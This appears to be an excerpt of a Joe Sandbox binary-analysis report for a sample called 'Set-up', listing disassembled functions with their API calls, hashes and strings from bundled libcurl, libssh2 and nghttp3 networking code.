Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
API String ID: 3302935713-3407012168
Opcode ID: 0f9960e56f8063d7939c4ec1ef619540c5a6e52dbf101dd02b00ab623c32a783
Instruction ID: 0aa861102ea475fd90cdd8c6181dfc8ad4122f45edf5f5bc3e055fff527e8790
Opcode Fuzzy Hash: 0f9960e56f8063d7939c4ec1ef619540c5a6e52dbf101dd02b00ab623c32a783
Instruction Fuzzy Hash: B1E104B5A04301AFD7109B24DC41B6BB7E4FFA5714F08852AFC5A9B382E774E901C7A2

Function 00B0A140 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 341COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 00B0A29A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 00B0A2C5
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 00B0A2E3

Part of subcall function 00B0A5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 00B0A5FC

Strings

lblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 00B0A527
node->blk->n == NGHTTP3_KSL_MIN_NBLK, xrefs: 00B0A4D3
lblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 00B0A566
nghttp3_ksl.c, xrefs: 00B0A4CE, 00B0A4E3, 00B0A4F8, 00B0A50D, 00B0A522, 00B0A537, 00B0A54C, 00B0A561, 00B0A576, 00B0A58B
rblk->n >= NGHTTP3_KSL_MIN_NBLK + n, xrefs: 00B0A551
n > 0, xrefs: 00B0A53C, 00B0A57B
rblk->n <= NGHTTP3_KSL_MAX_NBLK - n, xrefs: 00B0A512
i > 0, xrefs: 00B0A4E8, 00B0A590
i < blk->n - 1, xrefs: 00B0A4FD

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memcpy$memmove
String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
API String ID: 1283327689-1606465060
Opcode ID: ccb547f6d95a0cefd8ec5cd372c0f4223ca1f53a021f54d37e123ecfcb861191
Instruction ID: 4864d1be99d86e75a2faa5cf83fd8f645a668c5032a996678e742b130f80200e
Opcode Fuzzy Hash: ccb547f6d95a0cefd8ec5cd372c0f4223ca1f53a021f54d37e123ecfcb861191
Instruction Fuzzy Hash: 22C1D2316043059FD718DF18C8869AEBBE5FF98300F548969E9499B2C6E770ED84CF92

Function 00B54080 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 190fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00FE32B5), ref: 00B54094
feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B540A3
rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B540B0
fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000001,00000000), ref: 00B540D6
feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B540F4
rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B54101
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B5410F
fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000), ref: 00B5413F
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B5414C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00B54165
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B54186
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00B541A0
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000020,00000000), ref: 00B541BA
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,00000020,00000000), ref: 00B541E4

Strings

Invalid key data, not base64 encoded, xrefs: 00B54214
Invalid data in public key file, xrefs: 00B54117
Unable to allocate memory for public key data, xrefs: 00B5418E
Unable to read public key from file, xrefs: 00B541A8
Unable to open public key file, xrefs: 00B540BA
Missing public key data, xrefs: 00B5417E
Invalid public key data, xrefs: 00B5422E

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: fclose$feoffreadmemchrrewind$fopenisspace
String ID: Invalid data in public key file$Invalid key data, not base64 encoded$Invalid public key data$Missing public key data$Unable to allocate memory for public key data$Unable to open public key file$Unable to read public key from file
API String ID: 752180523-3150497671
Opcode ID: 382910ca205abd953af05d1dc236ce5ea7b16318cc09f100f489bd4db20caae7
Instruction ID: 9d8d0034a37310e8a2359522798120d34593df8df6e05c14d965442d8418e2d9
Opcode Fuzzy Hash: 382910ca205abd953af05d1dc236ce5ea7b16318cc09f100f489bd4db20caae7
Instruction Fuzzy Hash: 9351EBB1A043446FD6106A36AC4AF2B39DCDF5235AF1444B8FC4EE2282FA31D9989573

Function 00AD27E0 Relevance: 35.4, APIs: 4, Strings: 16, Instructions: 406stringnetworkCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AD2AD7
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AD2B3D
sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00AD2D30
WSAGetLastError.WS2_32 ref: 00AD2D3A

Strings

timeout, xrefs: 00AD2CD3
TFTP buffer too small for options, xrefs: 00AD2C60
octet, xrefs: 00AD280B
%lld, xrefs: 00AD2B82
TFTP finished, xrefs: 00AD289C
tftp.c, xrefs: 00AD2B03, 00AD2C6E, 00AD2D62
tftp_send_first: internal error, xrefs: 00AD295C
Internal state machine error, xrefs: 00AD28C5
TFTP filename too long, xrefs: 00AD2AF5
Connected for receive, xrefs: 00AD290B, 00AD298A
tsize, xrefs: 00AD2BAD
Connected for transmit, xrefs: 00AD29E0, 00AD2A34
blksize, xrefs: 00AD2C33
%s%c%s%c, xrefs: 00AD2B2A
netascii, xrefs: 00AD2810, 00AD2B23
0, xrefs: 00AD2B94

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlen$ErrorLastsendto
String ID: %lld$%s%c%s%c$0$Connected for receive$Connected for transmit$Internal state machine error$TFTP buffer too small for options$TFTP filename too long$TFTP finished$blksize$netascii$octet$tftp.c$tftp_send_first: internal error$timeout$tsize
API String ID: 3285375004-3063461439
Opcode ID: 1d3c837462cfe67f96136846bd0ee8c333168946ca4033c7802b64c5c7355ad2
Instruction ID: e366b661caf1cadca6700c06f2f8ba8265e9cc88b191c857581ef728a3067759
Opcode Fuzzy Hash: 1d3c837462cfe67f96136846bd0ee8c333168946ca4033c7802b64c5c7355ad2
Instruction Fuzzy Hash: 99E11771B00301AFD7149B24CD86F6A77A4EF66704F04456AF84AAB392EB72EC14D7D2

Function 00A84720 Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 426stringCOMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000040,?), ref: 00A84749
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000005D), ref: 00A848E5
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 00A8491B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84963
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,0000000A), ref: 00A84971
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A8497B

Part of subcall function 00A806F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,00A85663,?), ref: 00A806F9

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84A41
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000), ref: 00A84A63
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84A6D
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00A84AE0
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84AEA
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00A84B28
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84B34
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000001,?,00000000), ref: 00A84B76
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00A84B80

Strings

urlapi.c, xrefs: 00A847B9, 00A847CC, 00A847E2, 00A8482C, 00A84856, 00A84879, 00A849A6
%u.%u.%u.%u, xrefs: 00A84C00
%ld, xrefs: 00A849BC

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _errno$strtoul$strchr$memchrstrlen
String ID: %ld$%u.%u.%u.%u$urlapi.c
API String ID: 102816355-2423153182
Opcode ID: 128f15af3b82bf10758e9cb4aee101f8f52f7ac66efa720834849fb8372548ea
Instruction ID: c3ff015982bc1f3dfc5e638c9749d892472a3ac49ef4473cd0d338045b79d282
Opcode Fuzzy Hash: 128f15af3b82bf10758e9cb4aee101f8f52f7ac66efa720834849fb8372548ea
Instruction Fuzzy Hash: 05D116B19082026FE7247B20DC46B7E7BE49F5A354F094438F8899B282F779DD54C7A2

Function 00AA63E0 Relevance: 31.8, APIs: 8, Strings: 13, Instructions: 330stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA86F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000003), ref: 00AA8704

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00AA6460
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00AA6472
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00AA6487
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 00AA649C
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000003A,0000003A), ref: 00AA6654
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00AA6666
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,0000003A), ref: 00AA667B

Strings

/LOOKUP:, xrefs: 00AA6635
CLIENT libcurl 8.10.1MATCH %s %s %sQUIT, xrefs: 00AA65B9
lookup word is missing, xrefs: 00AA64DF, 00AA66B5
default, xrefs: 00AA64C1, 00AA6564, 00AA6697
/M:, xrefs: 00AA642A
/FIND:, xrefs: 00AA6441
dict.c, xrefs: 00AA6706, 00AA6719
/MATCH:, xrefs: 00AA6413
CLIENT libcurl 8.10.1%sQUIT, xrefs: 00AA6778
CLIENT libcurl 8.10.1DEFINE %s %sQUIT, xrefs: 00AA66E0
/D:, xrefs: 00AA661E
/DEFINE:, xrefs: 00AA6607
Failed sending DICT request, xrefs: 00AA65D1, 00AA66F4, 00AA678C

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strchr$strlen
String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 8.10.1%sQUIT$CLIENT libcurl 8.10.1DEFINE %s %sQUIT$CLIENT libcurl 8.10.1MATCH %s %s %sQUIT$Failed sending DICT request$default$dict.c$lookup word is missing
API String ID: 842768466-2079990832
Opcode ID: bf88f313a2ecbfc70b262999e6a4dd3d1491fcfd155ba70d363a28b731dda947
Instruction ID: e8bdbca2c3f2eafc7132e7f41f18d501ab32675fb05f187d56388d208d23d67f
Opcode Fuzzy Hash: bf88f313a2ecbfc70b262999e6a4dd3d1491fcfd155ba70d363a28b731dda947
Instruction Fuzzy Hash: 92A139A1E043816AE72227349E02B363B984F67B48F0D4078FD499B1D3FBA5DD50DA62

Function 00B4C700 Relevance: 30.2, APIs: 6, Strings: 11, Instructions: 478COMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00B4C719
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00B4C7C9
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00B4CB6F
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(00FE2438,sftp.c,000006F4), ref: 00B4CD6E
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left,sftp.c,000005EE), ref: 00B4CD83
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rc != LIBSSH2_ERROR_EAGAIN || !filep->eof,sftp.c,000005EF), ref: 00B4CD98

Strings

Response too small, xrefs: 00B4CC86
gesftp_read() internal error, xrefs: 00B4CA72
rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left, xrefs: 00B4CD7E
FXP_READ response too big, xrefs: 00B4CCCE
Read Packet At Unexpected Offset, xrefs: 00B4CCBD
SFTP Protocol badness, xrefs: 00B4CCC7
rc != LIBSSH2_ERROR_EAGAIN || !filep->eof, xrefs: 00B4CD93
malloc fail for FXP_WRITE, xrefs: 00B4CCDB
sftp.c, xrefs: 00B4CD64, 00B4CD79, 00B4CD8E
SFTP Protocol badness: unrecognised read request response, xrefs: 00B4CCB3
SFTP READ error, xrefs: 00B4CCFF

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: _assert$memcpy$_time64
String ID: FXP_READ response too big$Read Packet At Unexpected Offset$Response too small$SFTP Protocol badness$SFTP Protocol badness: unrecognised read request response$SFTP READ error$gesftp_read() internal error$malloc fail for FXP_WRITE$rc != LIBSSH2_ERROR_EAGAIN || !filep->data_left$rc != LIBSSH2_ERROR_EAGAIN || !filep->eof$sftp.c
API String ID: 2498518694-199359813
Opcode ID: c111ba54cc800f7f99bb18f2c917bba39ddef40cb1261faee3ebcab42a5e8e47
Instruction ID: 7ddf98f913347eaf4c0b5950a983fb54e4a347dfe1cf74c3754894ae4023bb25
Opcode Fuzzy Hash: c111ba54cc800f7f99bb18f2c917bba39ddef40cb1261faee3ebcab42a5e8e47
Instruction Fuzzy Hash: 9602C2719053049FC760DF24DC85BAABBE4FF88714F1449A9F88A97252E730EE14DB92

Function 00A908C2 Relevance: 28.3, APIs: 4, Strings: 12, Instructions: 295stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00A9090A
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00A90979

Strings

incorrect date format for %.*s, xrefs: 00A94738
mtime, xrefs: 00A93F5B
Syntax error: chmod permissions not a number, xrefs: 00A92AFC
vssh/libssh2.c, xrefs: 00A909BD, 00A909DE, 00A92AB9, 00A92ADA, 00A932C1, 00A932E2, 00A93BBA, 00A93BDC, 00A94746, 00A9476C
chmod, xrefs: 00A908E2, 00A92A66
Syntax error: chown uid not a number, xrefs: 00A93304
date overflow, xrefs: 00A93F94
chown, xrefs: 00A9325D
Syntax error: chgrp gid not a number, xrefs: 00A90A00
atime, xrefs: 00A93F47, 00A94856
Attempt to get SFTP stats failed: %s, xrefs: 00A93C06
chgrp, xrefs: 00A90959

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strlenstrtoul
String ID: Attempt to get SFTP stats failed: %s$Syntax error: chgrp gid not a number$Syntax error: chmod permissions not a number$Syntax error: chown uid not a number$atime$chgrp$chmod$chown$date overflow$incorrect date format for %.*s$mtime$vssh/libssh2.c
API String ID: 4005410869-1121828786
Opcode ID: 37da1ee323cf67883fe21bab556a3f8cbf8f51b8b395dcd99cd4f93bc1cb0715
Instruction ID: 8683c7257b8838d0a461a87c417ec5d4e42eeee7d71318b484a2b6327979aa8b
Opcode Fuzzy Hash: 37da1ee323cf67883fe21bab556a3f8cbf8f51b8b395dcd99cd4f93bc1cb0715
Instruction Fuzzy Hash: 1EB137B0B14300AFD711EF24DC46F1AB7E5AF49718F048568F9485B3D2E372EA159B82

Function 00ADC350 Relevance: 28.2, APIs: 3, Strings: 13, Instructions: 166stringnetworkCOMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unknown,00000100), ref: 00ADC37A
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,Unknown error), ref: 00ADC476
WSAGetLastError.WS2_32 ref: 00ADC4AE

Strings

erro, xrefs: 00ADC568
SSL_ERROR unknown, xrefs: 00ADC502, 00ADC524
QUIC connection has been shut down, xrefs: 00ADC3D1
r, xrefs: 00ADC561
SSL certificate verification failed, xrefs: 00ADC582
SSL_ERROR_SYSCALL, xrefs: 00ADC4F5
Unknown error, xrefs: 00ADC468, 00ADC474
SSL certificate problem: %s, xrefs: 00ADC420
Unkn, xrefs: 00ADC578
own , xrefs: 00ADC570
unknown, xrefs: 00ADC374
QUIC connect: %s in connection to %s:%d (%s), xrefs: 00ADC525
No error, xrefs: 00ADC463

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: ErrorLastmemcpystrcpy
String ID: No error$QUIC connect: %s in connection to %s:%d (%s)$QUIC connection has been shut down$SSL certificate problem: %s$SSL certificate verification failed$SSL_ERROR unknown$SSL_ERROR_SYSCALL$Unkn$Unknown error$erro$own $r$unknown
API String ID: 31095072-3036451936
Opcode ID: a8c5725902a1cafdd6570f64aa1b5da73738b16d76b84763a86f0d4073944c32
